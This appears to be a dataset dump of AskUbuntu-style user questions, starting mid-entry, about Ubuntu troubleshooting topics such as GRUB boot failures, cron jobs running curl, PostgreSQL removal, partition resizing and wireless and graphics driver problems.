set the volume of my monitor , weird . my question is ... how can i tell ubuntu to use a different driver for a specific usb device ? or can someone point/throw me in the right direction ? more info . i believe this is a usb3 device , but supports usb2 . ness @ ness-linux : ~/ $ lsusb -v bus 001 device 010 : id 17e9:4300 displaylink device descriptor : blength 18 bdescriptortype 1 bcdusb 2.10 bdeviceclass 239 miscellaneous device bdevicesubclass 2 ? bdeviceprotocol 1 interface association bmaxpacketsize0 64 idvendor 0x17e9 displaylink idproduct 0x4300 bcddevice 4.06
371704	how do i avoid grub errors with ubuntu	a while back something went wrong with my dell laptop with ubuntu installed . it got an error 17 . this happened right after i was messing around with files trying to get a game to run smoothly on it but that was when i knew nothing abou pc gaming and just expected any pc game to work on any computer . i think thats what caused the error . so recently my friend wiped my hard drive clean with dban and i 'm thinking about doing a clean install of ubuntu alone because i actually liked it for internet browsing and libre word . plus i do n't have any money to get a new operating system right now . someone told me to get an illegal version of windows xp or windows 7 but i 'm paranoid about viruses and it not working properly . i 'm just wondering if the grub errors are common with ubuntu . i 'm hoping that they 're not common and easy to avoid . and i 'm hoping that the last error was because i was screwing around with it . because i do n't want to deal with errors this second time i install it .
371707	ubuntu 12.04 : crontab stopped running/curl and cron blocking ?	i have created a number of php daemons in the past and my general procedure is this : run a cron job every minute to start up a new instance of the daemon create a log file check to see if enough daemons are already running , i typically want several running at the same time kill the current instance is too many/keep if there are n't enough instances erase log file if instance died due to too many instances up until saturday this worked just fine . then the cron stopped running all together . on saturday i changed the static ip of the machine . this broke a lot of things , including apt-get , but they have been fixed . and while that is all i remember doing to the machine on saturday , outside of general coding/troubleshooting php scripts , it appears the cron stopped running on midnight friday/saturday and i made the change to the network and static ip saturday afternoon . that said , i 'm deducing this by looking at the file time of a file that cron should be updating every 5 minutes . i do not have an mta install ( although i 've considered it recently ) so i am not getting any output from cron saved off . that said , most of my cron jobs are to fire a php script via curl . all the scripts create their own log file and most do not delete themselves . the reason i mentioned the daemon is that the cron job for it should fire once a minute and it is not . no log is being created ( i commented out the code to remove it ) and the daemon script runs fine when i run it manually , including , not deleting the log . so i should have a new log file being created every minute if cron is running and those logs are not being created . here are the 2 crons in question : # db via gearman */5 * * * * curl -m 290 http : //127.0.0.1/ver1/php/maintenancetools/deter_active_gearman_job_servers.php */1 * * * * curl -m 86000 http : //127.0.0.1/ver1/php/dbaccess/gearman_dbworker.php the code inside the daemon ( gearman_dbworker.php ) is set to die 3 hrs after starting and there should be 5 running concurrently . i 've looked at these ( and following their suggestions ) : crontab suddenly stopped working http : //stackoverflow.com/questions/11662209/linux-crontab-not-executing i followed the suggestion of removing the cron and rebooting then reinstalling it from a copy . no go . when i run cat /var/log/syslog | grep cron -c 1 as suggested i get the following : nov 5 12:50:38 gabe-quad crontab [ 2770 ] : ( root ) begin edit ( root ) nov 5 12:51:01 gabe-quad cron [ 2782 ] : ( root ) cmd ( curl -m 86000 http : //127.0.0.1/ver1/php/dbaccess/gearman_dbworker.php ) nov 5 12:51:06 gabe-quad crontab [ 2770 ] : ( root ) end edit ( root ) nov 5 12:51:09 gabe-quad crontab [ 2784 ] : ( gabe ) begin edit ( gabe ) nov 5 12:51:32 gabe-quad cron [ 2781 ] : ( cron ) info ( no mta installed , discarding output ) nov 5 12:52:01 gabe-quad cron [ 2796 ] : ( root ) cmd ( curl -m 86000 http : //127.0.0.1/ver1/php/dbaccess/gearman_dbworker.php ) nov 5 12:52:08 gabe-quad crontab [ 2784 ] : ( gabe ) replace ( gabe ) nov 5 12:52:08 gabe-quad crontab [ 2784 ] : ( gabe ) end edit ( gabe ) nov 5 12:52:18 gabe-quad kernel : [ 944.469386 ] init : cron main process ( 1338 ) killed by term signal nov 5 12:52:18 gabe-quad cron [ 2818 ] : ( cron ) info ( pidfile fd = 3 ) nov 5 12:52:18 gabe-quad cron [ 2819 ] : ( cron ) startup ( fork ok ) nov 5 12:52:18 gabe-quad cron [ 2819 ] : ( cron ) info ( skipping @ reboot jobs -- not system startup ) nov 5 12:53:01 gabe-quad cron [ 2830 ] : ( root ) cmd ( curl -m 86000 http : //127.0.0.1/ver1/php/dbaccess/gearman_dbworker.php ) what should be noted here is that this is the result i get right now at 13:08 but the last entry is 12:53 right after i ran sudo service cron restart . nothing new has been added in 15 min even though one cron should run every minute and the other every 5 min . from what i 've been able to tell so far the line : ( root ) cmd ( curl -m 86000 http : //127.0.0.1/ver1/php/dbaccess/gearman_dbworker.php ) is always the last line . making me think that somehow this is getting called , the php script is never executed , and somewhere curl is hanging . i 've run the cron line manually and got the response , and log file , i expect . at least when i run it via my user . curl appears to be dying when run under sudo . and by extension i assume when i run curl via my root crontab . it 's not a big deal to run this out of my user crontab however , the failed job appears to be blocking everything else from running . while i write this i see that a couple more instances of the gearman_dbworker cron jobs have been attempted but neither were successful and that 's 2 attempts ( at 13:16:01 & 13:17:01 ) on a 1 min cron over the past 10+ min . and right now it is 13:21 with no further attempts having been logged . thanks
371709	starting and killing evince process in a loop	i have certain pdf files . i want to inspect each of them for 20 seconds . the way i was trying to do that is like following : for file in *.pdf ; do echo $ file ; evince $ file ; sleep 20s ; killall evince ; done . it displays the first file , but does not kill it after 20s . what is going wrong here ?
371711	ios 7 locked bug via ubuntu 13.10	i wanted to bring up an issue with the latest ubuntu release that i hope can be solved . although i will agree with the community that ios 7 is not the most open platform release , it still is my desire to be able to grab photos , music , and files off my phone similar to what i would do to any other device . every time i connect my device to ubuntu , i receive the following notification : the device `` justin 's iphone '' is locked . enter the passcode on the device and click `` try again '' . on my iphone , i select the following permissions . unfortunately , this is where problems start to arise . it appears that ubuntu either does not recognize the permissions from my iphone or the iphone is not allowing itself to truly be unlocked . as we can see the permissions are denied . browsing askubuntu , i encountered the following suggestion . after running the code , i receive the following error : justin @ justin-ct15 : ~ $ idevicepair unpair & & idevicepair pairerror : device d1fea2c56e51199f901eb34020a1581ea31a2a50 is not paired with this host if i call the command again , i receive another error : justin @ justin-ct15 : ~ $ idevicepair pair error : could not pair with the device because a passcode is set . please enter the passcode on the device and retry . ultimately , i am stuck to experiment with solutions that end up not working . i am troubled by the lack of information and support for the ios 7 platform on ubuntu 's latest release . if anyone has a workable solution or experiment for a workaround , i am happy to try thanks for reading and have a wonderful day !
371714	unable to boot to ubuntu	just got a new laptop and removed windows 8 and installed 13.10 using liveusb . initially it was booting to `` no boot media '' but i was able to resolve it with boot-repair . i realized some of the items i need is n't supported on 13.10 , so attempted to install 13.04 instead . now without liveusb , the laptop just boots to `` no boot media '' but boot repair does n't seem to be fixing it . tried going back to 13.10 , but no dice . after boot repair it says `` please do not forget to make your bios boot on sda1/efi/ubuntu/grubx64.efi file ! '' . gparted shows sda1 has the boot flag . using toshiba satellite p50 . secure boot disabled . uefi enabled . any help would be highly appreciated . http : //paste.ubuntu.com/6366556/
371715	error mounting /dev/sda4 at /media/user/e : command-line `mount -t `` ntfs '' -o	i forgot the password of my user login , so i read some forums and i did what they stated ( as follows ) : mount -rw -o remount / passwd user sync reboot -f now i can login using my new password but i ca n't access any drive on my hard disk . it says error mounting /dev/sda4 at /media/user/e : command-line mount -t `` ntfs '' -o please guide me what should i do now ?
371722	uninstall postgresql from ubuntu	i simply do n't understand what 's going on . sudo apt-get remove postgresql results in : reading package lists ... done building dependency tree reading state information ... done package 'postgresql ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 35 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up postgresql-9.1 ( 9.1.10-0ubuntu13.04 ) ... * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-11-05 12:40:58 pst fatal : could not create lock file `` /var/run/postgresql/.s.pgsql.5432.lock '' : permission denied [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : postgresql-9.1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i mean , why is it trying to start the server . right i 'm a bit of a unix noob and a huge postgres noob so bear with me , but randomly starting the server while i 'm trying to uninstall it seems so random . just do n't get it . how can i completely and utterly uninstall postgresql ?
371723	issue with increasing the root partition from the swap	i have an issue with increase the size of my root partition . i have elementaryos luna , and while installing it asked me how much space i want to use . i choosed 15 gb for it , because i want to use this as an alternative system . the issue is that after the installation was complete , i found out that my root partition is only 7 gb big , and swap is 8 gb which is useless cuz i have 8 gb of ram . now i want to shrink the swap and increase the size of my root partition , so i booted the livecd and used gparted . i shrinked the swap without any problems , but now i cant add that free space to any partition . i also turned swap off . i would add a picture , but i need at least 10 reputation to post images ( stupid ) its also worth mentioning that in gparted its showing my partition in a different way . i would post an image but i cant , so i need to write it down . its something like this [ pointing arrow down ] /dev/sda4 extended /dev/sda5 ntfs /dev/sda6 ext4 ( which is my main partition ) /dev/sda7 linux-swap unallocated picture :
371727	natural scrolling in nautilus	in ubuntu 13.10 , i have `` natural scrolling '' enabled . it works great except in nautilus which uses reversed ( normal instead of natural ) scrolling direction ( for vertical scrolling , not just horizontal as in the related question on askubuntu.com ) . there are many solved and hacky-solved similar bug reports out there , but i believe this issue is raised anew given that the `` natural scrolling '' setting is now implemented out-of-the-box . some earlier bug reports were closed because natural scrolling was accomplished by manually editing ~/.xmodmap or by using xinput -- set-prop $ device_id `` synaptics scrolling distance '' to negative values , but neither solution was considered `` supported '' as of yet . however , the current setting is available in system settings ( and appears to work by switching the sign in the synaptics scrolling distance property ) , but nautilus still does not respect this property . gedit , which also uses smooth scrolling , does respect the natural scrolling property . is this a bug that should be / is reported somewhere for ubuntu 13 ( .10 ) ? is there a solution or a workaround that anyone is aware of ?
371728	ca n't install apache 2.2.22 on ubuntu 13.10	my work environment requires apache 2.2.22 instead of the latest version of 2.4 . my machine is currently running ubuntu 13.10 . when i use synaptic or apt-get it will not allow me to choose an older version of apache than 2.4 . so my question is , how can i force an install of apache 2.2.22 on ubuntu 13.10 using synaptic or apt-get . when i do try to specify the version i get the following : sudo apt-get install apache2=2.2.22-1ubuntu1 [ sudo ] password for b18c1 : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : apache2 : depends : apache2-mpm-worker ( = 2.2.22-1ubuntu1 ) but it is not going to installed or apache2-mpm-prefork ( = 2.2.22-1ubuntu1 ) but it is not going to be installed or apache2-mpm-event ( = 2.2.22-1ubuntu1 ) but it is not going to be installed or apache2-mpm-itk ( = 2.2.22-1ubuntu1 ) but it is not going to be installed depends : apache2.2-common ( = 2.2.22-1ubuntu1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
371737	install postgresql . why is initdb unavailable ?	i 'm following these instructions , however i can only get to step 17.2 . despite installing postgresql successfully via the sudo apt-get install postgresql command , upon running initdb -d /usr/local/pgsql/data ubuntu tells me that it 'initdb ' is n't installed . the instructions tell me this command is installed by sudo apt-get install postgresql so what 's going on ? i can make initdb available by installing postgres-xc , but i think postgres-xc is just some weird third party rubbish , and it 's not detailed in the instructions . any ideas ?
371739	disable unity switch desktop notification overlay ?	when i switch desktops in unity , a small expo appears as overlay . i remember i set its visibility to 1.5 seconds , but now ca n't remember where those settings are . how can i disable it since it 's making my firefox fullscreen flicker as long as its visible ? i can take a snapshot if you do n't know what i am talking about .
371741	wireless not working , but wired does	first of all i 'm new to ubuntu , just bought a laptop with ubuntu yesterday . i disable wireless networking in the upper right corner , and i do n't have option to enable it back . i tried a lot of things and none is seems to work : i installed wicd network manger , and it says no wireless network found , but i assure you there are several of them as my smart tv can detect them . when i type rfkill list , i get this : 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no when i type ifconfig wlan0 , i get this : wlan0 : error fetching interface information : device not found
371742	how to restore ubuntu login screen after lubuntu install ?	i have ubuntu 13.10 installed . i then installed lubuntu 13.10 ( sudo apt-get install lubuntu-desktop ) too . as a result the login screen has changed and i can no longer get an on screen keyboard . how can i restore the login screen to the original ubuntu default ?
371744	desktop in kubuntu lacks bars and quite everything after trying to apply plymouth fix for proprietary drivers	i 'm running kubuntu 13.10 , my computer 's graphics card is nvidia gt 520 . i tried to fix that plymouth 's problem with proprietary graphics driver using an old script i found on the internet ( it was coded for natty , now that i think about it i should n't have done it ) . i ran that script and rebooted my computer . first incorrect behaviour i noticed was that plymouth only displayed its text splash only on 1/4th of the screen , though when i pressed esc key the logs were displaying correctly . main problem appeared when i logged in . all my desktop 's windows lack menu bar , ca n't be closed with alt-f4 , and they do n't appear on the taskbar . i tried fixing it by reinstalling grub a few times , purging /etc/grub.d and /boot/grub , but only the text splash issue was fixed . how can i fix that ? this is the script i used .
371746	nautilus exits unexpectedly	if i unmount a drive using nautilus the nautilus-window closes - i do n't know why . i think it 's a bug , or is there a way to change this useless behaviour of the default gnome-file-manager .
371748	unable to find expected entry 'main/binary-amd64/packages ' in release file	i run an ubuntu server 12.04.3 lts . today , i wanted to update it , but i did not managed it ( yes ... ) , however upgrading worked well . i do n't want you to solve my problem but it would be greatful if you could give me some hints . i googled hours , i fould a lot of this kind of errors , but not exactly this . here is the output of apt-get update : hit http : //filepile.fastit.net precise release.gpg hit http : //filepile.fastit.net precise release hit http : //filepile.fastit.net precise/main amd64 packages hit http : //filepile.fastit.net precise/restricted amd64 packages hit http : //filepile.fastit.net precise/universe amd64 packages hit http : //filepile.fastit.net precise/multiverse amd64 packages hit http : //filepile.fastit.net precise/main i386 packages hit http : //filepile.fastit.net precise/restricted i386 packages hit http : //filepile.fastit.net precise/universe i386 packages hit http : //filepile.fastit.net precise/multiverse i386 packages ign http : //filepile.fastit.net precise/main translationindex ign http : //filepile.fastit.net precise/multiverse translationindex ign http : //filepile.fastit.net precise/restricted translationindex ign http : //filepile.fastit.net precise/universe translationindex ign http : //filepile.fastit.net precise/main translation-en_gb ign http : //filepile.fastit.net precise/main translation-en ign http : //filepile.fastit.net precise/main translation-en_gb.utf-8 hit http : //archive.canonical.com precise release.gpg ign http : //filepile.fastit.net precise/multiverse translation-en_gb ign http : //filepile.fastit.net precise/multiverse translation-en ign http : //filepile.fastit.net precise/multiverse translation-en_gb.utf-8 ign http : //filepile.fastit.net precise/restricted translation-en_gb ign http : //filepile.fastit.net precise/restricted translation-en ign http : //filepile.fastit.net precise/restricted translation-en_gb.utf-8 ign http : //filepile.fastit.net precise/universe translation-en_gb ign http : //filepile.fastit.net precise/universe translation-en ign http : //filepile.fastit.net precise/universe translation-en_gb.utf-8 hit http : //archive.ubuntu.com precise release.gpg hit http : //archive.canonical.com precise release hit http : //archive.ubuntu.com precise release hit http : //archive.ubuntu.com precise/main sources hit http : //archive.ubuntu.com precise/restricted sources hit http : //archive.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com precise/restricted i386 packages hit http : //archive.ubuntu.com precise/multiverse i386 packages hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/main translation-en_gb hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en_gb hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en_gb hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //fr.archive.ubuntu.com precise-security release.gpg hit http : //fr.archive.ubuntu.com precise-updates release.gpg hit http : //fr.archive.ubuntu.com precise-security release hit http : //fr.archive.ubuntu.com precise-updates release hit http : //fr.archive.ubuntu.com precise-security/main amd64 packages hit http : //fr.archive.ubuntu.com precise-security/restricted amd64 packages hit http : //fr.archive.ubuntu.com precise-security/universe amd64 packages hit http : //fr.archive.ubuntu.com precise-security/multiverse amd64 packages : w : failed to fetch http : //archive.canonical.com/dists/precise/release unable to find expected entry 'main/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . hit http : //fr.archive.ubuntu.com precise-security/main i386 packages hit http : //fr.archive.ubuntu.com precise-security/restricted i386 packages hit http : //fr.archive.ubuntu.com precise-security/universe i386 packages hit http : //fr.archive.ubuntu.com precise-security/multiverse i386 packages hit http : //fr.archive.ubuntu.com precise-security/main translationindex hit http : //fr.archive.ubuntu.com precise-security/multiverse translationindex hit http : //fr.archive.ubuntu.com precise-security/restricted translationindex hit http : //fr.archive.ubuntu.com precise-security/universe translationindex hit http : //fr.archive.ubuntu.com precise-updates/main amd64 packages hit http : //fr.archive.ubuntu.com precise-updates/restricted amd64 packages hit http : //fr.archive.ubuntu.com precise-updates/universe amd64 packages hit http : //fr.archive.ubuntu.com precise-updates/multiverse amd64 packages hit http : //fr.archive.ubuntu.com precise-updates/main i386 packages hit http : //fr.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //fr.archive.ubuntu.com precise-updates/universe i386 packages hit http : //fr.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //fr.archive.ubuntu.com precise-updates/main translationindex hit http : //fr.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //fr.archive.ubuntu.com precise-updates/restricted translationindex hit http : //fr.archive.ubuntu.com precise-updates/universe translationindex hit http : //fr.archive.ubuntu.com precise-security/main translation-en hit http : //fr.archive.ubuntu.com precise-security/multiverse translation-en hit http : //fr.archive.ubuntu.com precise-security/restricted translation-en hit http : //fr.archive.ubuntu.com precise-security/universe translation-en hit http : //fr.archive.ubuntu.com precise-updates/main translation-en_gb hit http : //fr.archive.ubuntu.com precise-updates/main translation-en hit http : //fr.archive.ubuntu.com precise-updates/multiverse translation-en_gb hit http : //fr.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //fr.archive.ubuntu.com precise-updates/restricted translation-en_gb hit http : //fr.archive.ubuntu.com precise-updates/restricted translation-en hit http : //fr.archive.ubuntu.com precise-updates/universe translation-en_gb hit http : //fr.archive.ubuntu.com precise-updates/universe translation-en and here is my /etc/apt/sources.list : # # # # # # ubuntu main repos deb http : //filepile.fastit.net/ubuntu/ precise main restricted universe multiverse # deb http : //de.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //archive.canonical.com/ precise main restricted universe multiverse # # # # # # ubuntu update repos deb http : //fr.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ precise main restricted multiverse deb-src http : //archive.ubuntu.com/ubuntu precise main restricted multiverse thanks for your help !
371749	why does n't atomic partition scheme work ?	my preseed file specifies the atomic scheme : d-i partman-auto/choose_recipe select atomic but i 'm getting a /home partition that 's wasting most of my disk . how do i debug this ?
371750	how to routinely back up files on ubuntu server 12.xx ?	i would like to know how i can setup a automated backup for ubuntu server to either make a compressed backup of a group of files or upload them to a remote server . i do n't need a whole system backup just critical files in a few directories . any suggestions ? also i 'm using a 12.xx ubuntu server without a gui .
371751	partition hard drive for data	greetings ~ i am a new linux/ubuntu user . for various reasons ( mostly my own ignorance ) i am on my third install of ubuntu 12.04 . i want to partition the hard drive to create a drive for data and personal files in case i ever have to install again . i have been struggling all afternoon to make a gparted live usb . tuxboot looked like the answer but i get an error message when using it . so , i am asking for help . ultimately , i want to partition the hard drive for data and personal files . what do you recommend ?
371752	ubuntu freezes after hit install buton or try whitout install al versions	i have a pc with 4gb ram gygabyte gt 440 graphic card asus p8h61-m pro motherboard and i5-2500k cpu i tried every version from 10 to 13.10 and the same result , after i hit the try whithout install or install ubuntu i get a black screen ...
371753	running ubuntu on a microprocessing board	i 'm pursuing a project that requires the use of a microprocessing board that can run ubuntu . i have been searching the web , and have found some relatively expensive ti boards that will run it , as well as a board from adapteva that will run it . anybody have any suggestions on good boards/how to find boards that run ubuntu ? many boards obviously run linux and are easy to find , but finding ones that run the ubuntu distro is a bit harder .
371754	database for ubuntu compatible with microsoft database ?	i am trying ubuntu 12.04 booted from a dvd disk before i install it . i currently have windows 8 ( which i hate ) and i have a couple of data base programs with my movies , hundreds of movies , in them . is there a database available for ubuntu that is compatible with microsoft database ? there are too much data in the current database file for me to have to rewrite the program . so far , i love the ubuntu 12.04 . i have been able to access my microsoft works spreadsheet files and documents with no problem . and i like the thuderbird email and just about everything else about ubuntu 12.04 . i just need to be able to access my database files and to write lables and envelopes .
371758	xubuntu - apps become unresponsive intermittently	possibly relevant information : xubuntu 12.04 lts ( precise ) xfce 4.8 amd graphics ( kernel driver in use : fglrx_pci , kernel modules : fglrx , radeon ) the primary symptom of this issue has been my active rdesktop session to stop responding while everything else appears to work normally . i have been killing rdesktop and re-launching it , with it freezing after a seemingly random time period . the fastest was within seconds . the longest was a couple hours , although it 's usually within a few minutes . that being said , i have occasionally seen the terminal and web browsers also become unresponsive to keyboard input . they respond to clicks and will accept middle clicks ( to paste text ) without issue while remaining unresponsive to the keyboard input . i have been able to restore functionality , by switching workspaces and typing on the other workspace , then returning to the original workspace . this work-around typically does not work for rdesktop , although it has fixed rdesktop 's functionality twice . what is being reset when i do this ? what does this work-around/solution indicate may be the problem ?
371759	question about wifi connection files/certificates	here is the output i get when i run my school 's wifi .py file for secure login . i `` python securew2_joinnow.py '' i 've emailed them about it , but wanted to take a shot and post here , could be on my end . i ca n't make sense of this error , although the last line makes me think it 's on my end . fresh install , so maybe that is it ... traceback ( most recent call last ) : file `` securew2_joinnow.py '' , line 252 , in < module > main ( ) file `` securew2_joinnow.py '' , line 248 , in main nm.connect ( ) file `` securew2_joinnow.py '' , line 196 , in connect wireless_device = nm_iface.getdevicebyipiface ( 'wlan0 ' ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.networkmanager.unknowndevice : no device found for the requested iface .
371765	major performance issues with nvidia gt650m ( standalone ) 13.04 / 13.10	i have a laptop ( lenovo y500 ) featuring a standalone/single nvidia geforce gt650m . not a hybrid `` optimus '' configuration paired with the intel hd graphics . i 've tried basically all drivers from 304xx - > 331.13 beta drivers , and have n't seen any major performance changes . i 've actually received far better compiz performance using the nouveau driver , however the nouveau driver causes suspend issues with my machine . while using the nvidia drivers , i can make tweaks using compizconfig to gain some performance , but its still not comparable to the nouveau drivers . window movements are uncomfortably choppy ... i 've experimented with `` sync on vblank '' settings , framebuffer settings ( which speeds things up , but causes significant tearing ) , etc . anyone have any other ideas ? i 'm currently using ubuntu 13.10 . ( i also had the same issues in 13.04 ) here is output from `` lspci | grep vga '' : pmarino @ olympus : ~ $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 650m ] ( reva1 ) pmarino @ olympus : ~ $ thanks ! !
371767	how can i install adobe air on 64 bit ubuntu 13.10	hy , i used this tutorial and did n't work how-can-i-install-adobe-air and also this how-to-install-adobe-2-6-air-on-ubuntu if someone could help me with any tips about installing i remain fully grateful .
371773	ubuntu 13.10 boots into blank purple screen after fresh install	i decided that i wanted ubuntu 13.04 on my computer . i had previously installed 12.10 lts , and it worked right out of the box with no problems . later got bored of it , then formatted the entire drive blank . i let it blank for ~ 2 months . then , i decided to install ubuntu 13.10 . i burned it to my usb flash drive , using universal usb installer . the burn process was completed successfully . then i booted it successfully . i went into live cd mode to install ubuntu from it . i selected install and it was pretty much straight forward by then . after the successful install with no errors whatsoever i clicked to reboot my system . i took out the flash drive , then booted . it loaded successfully to the grub menu . but when i choose to boot ubuntu , it just goes to a blank purple screen . it stays like that forever . you may ask me to check the recovery mode and type some commands right ? when i select to boot from ubuntu in recovery mode it also does a blank purple screen . - i try booting the memory test . also a purple screen . i try to type nomodeset on the gfxmode line , still purple screen on ctrl+x . i type nomodeset on the quiet splash line , still boots purple screen . i remove quiet splash and do the same , still purple screen . i tried reinstalling multiple times , the last ubuntu version that my pc last worked on is 12.10 and 12.04 . once i install 13.04 same results as described above . 13.10 and 13.04 do n't work at . they both exactly have the above mentioned symptoms . i do n't know what to do next to fix this error . i ca n't run recovery or pretty much anything . i request some help on my problem . how to fix this ? my system specs are as follows : inspiron 15r n5010 64-bit 4gb ram intel hd graphics intel core i5 quad core @ 2.53 ghz
371774	windows 8 oem on dell desktop , installed ubuntu on partition , reboot to see only 'grub > '	i have a dell desktop with windows 8 installed ( oem ) . i shrunk the windows 8 partition to 200gb and installed ubuntu on the remaining 1.8 tb of space . during installation , i picked /dev/sda6 as my / partition and i chose the default /dev/sda to install the boot loader . when i restarted my computer , i end up in the grub menu . all i see now is grub > . i tried installing the boot-repair tool available on yannubuntu , and i am unable to resolve anything on my own . this is the paste generated by the tool can someone please teach me how to fix this issue ?
371776	enable wireless connection	i have an ubuntu 12.04 cd that i want to use to install . however , i can not get moz/ff to open/recognize the `` wireless '' . i have to have `` wireless '' internet for the install . my laptop indicates it is receiving the signal , i 've ticked the `` enable wireless '' from the dropdown menu , still ff wo n't access . had this same problem when i originally wanted to install 12.04 , so i went to 13.04 to get around it . that 's not feasible , this time . what is the 'fix '' for this problem ? ( laptop hp 2000 )
371777	dmesg - mounting takes longer in lubuntu than in debian	as an optimization freak , i have noticed for a long time ( and many different kernel versions 3.8-3.12 ) that booting lubuntu seems to delay 5 seconds when mounting the system partition . [ 4.993151 ] switched to clocksource tsc [ 9.156610 ] ext4-fs ( sda6 ) : mounted filesystem with writeback data mode . opts : ( null ) however in debian on the same system , this is not the case . [ 3.742636 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 3.886958 ] ext4-fs ( sda8 ) : mounted filesystem with ordered data mode . opts : ( null ) debian kernel : linux aod270 3.10-3-amd64 # 1 smp debian 3.10.11-1 ( 2013-09-10 ) x86_64 gnu/linux lubuntu kernel : linux aod270 3.12.0-031200-generic # 201311031935 smp mon nov 4 00:36:54 utc 2013 x86_64 x86_64 x86_64 gnu/linux what could be the cause of this and better , how can i get rid of this delay ?
371779	12.04 intel centriono wireless-n , no wireless , ethernet works fine .	i just upgraded from a older version of ubuntu and upgraded to 12.04 . i had my wireless working on the older version and seem to be having issues now . my ethernet connection works , but it seems that the wireless is not `` on '' . if i select edit connections i can see all my old wireless connections , but there is no `` connect to '' option anywhere . i 've followed this guide wireless not working on dell xps 17 after installing 12.04 with the following result . i am pretty sure i need this module ... not sure what my next steps should be . kevin @ mrcoomputeru : ~/desktop $ sudo modprobe iwlagn fatal : module iwlagn not found .
371780	ca n't change screen resolution after installing nvidia driver	i tried to install nvidia driver in my laptop , acer v5 , with nvidia optimus ( nvidia+intel ) . i also tried to install nvidia-prime so the nvidia graphics card can be used . after reboot , the screen resolution changed to 640x480 . there is an option to change to 1366x768 , but it did n't change after i pressed apply . any help ? i 'm a newbie on ubuntu .
371782	data stored under one user name transferred to another	i have data backed up from a linux os under one user name and data backed up from a windows pc under another user name - can i download the linus backup to the windows pc ?
371783	ubuntu does not offers me `` install alongside windows ''	any of the partitions makes in windows was not recognised by ubuntu , or zorin os , or linuxmint . it 's like a blank hard disc , 250 gb free . i 'm a new linux user , but what confuses me is that i was able to install ubuntu alongside windows on my laptop with no problems , but on pc ... no way !
371786	how do i bring back my files ?	i just opened up ubuntu 12.04 , and my toolbar was gone , as well as the launcher . i fixed this by resetting unity , but now all applications i had previously are gone , including the terminal . anything i do manage to open does n't have an icon on the launcher , but if you scroll over where it 's supposed to be , you get the tool tip ( as in , they 're invisible ) . also , the icons for files are messed up , and only show the same white page for everything , and the tool bar is transparant . another thing is that i ca n't access my flash drive , even though it 's plugged in .
371787	where are the unsaved custom wallpapers saved ?	i 'm new here and i need an answer to a specific question to which i did not find any useful answer despite the fact that several other people here had asked some more-or-less similar questions . well , here is the fact : today i have found a nice wallpaper on the internet and i have installed it not by downloading , like usual , but by choosing the `` lazy '' way - just by clicking on `` set as desktop background '' . soon after that , i have found another one and i did the same , not being pleased with the second one , i have decided to return to the first one . and this is how i have discovered that i do n't know where to take that lost wallpaper from ! i the wallpaper folder it is not , in the photos folder , obviously , it is not , but i imagine that there must be a place somewhere , where the it is kept saved but i do n't know where to look and how to reach it . so , please , help me solve this . i repeat , i am a newbie , i need abc-style explications . i have tried to look for the file in home folder , but i could not find it , be it invisible or not . thank you !
371789	dual boot windows 7 and ubuntu 13.10 computer not booting	after i upgraded to 13.10 , strange things started happening to my computer . there were now like 10 operating systems on grub , including 2 ubuntus and 2 windows 7 's . soon i stated having problems coming out of sleep mode from ubuntu ( the computer would not come out of sleep mode ) but i was able to get away by rebooting the computer . one day the same thing happened and i rebooted the computer . i could hear the sounds but nothing would show on the screen . how do i fix this ?
371790	unity problem on 13.04	ive started using ubuntu and when i log in i am presented with a blank desktop . i can access the terminal and have gone to the compizconfig settings manager and tried to enable opengl and the unity plugin but they just get disabled again . any help ?
371791	how do i address chromium slowdown following update	i 've just run updates which brought chromium up to `` version 30.0.1599.114 ubuntu 13.04 ( 30.0.1599.114-0ubuntu0.13.04.2 ) '' chromium is now much slower , taking 5-10 seconds in `` resolving host ... '' whenever a new page is accessed . is there any way to address this . i 've looked at similar questions on google but they refer to chrome settings not shared by this version of chromium .
371801	multiple shutdowns for upstart script	i need a script to shutdown differently depending on whether a user called stop or the system is going down . some background : i have two primary functionalities for ending a continuous process that i am running : stop and suspend . when i call stop myscript , i would like the stop functionality to be used . however , when the machine is shutting off , i would like the suspend functionality to be used . is this possible with upstart ? on a similar note , can i create a script-specific keyword that can specify my different shutdown types ( such that i could say stop myscript and suspend myscript ) ?
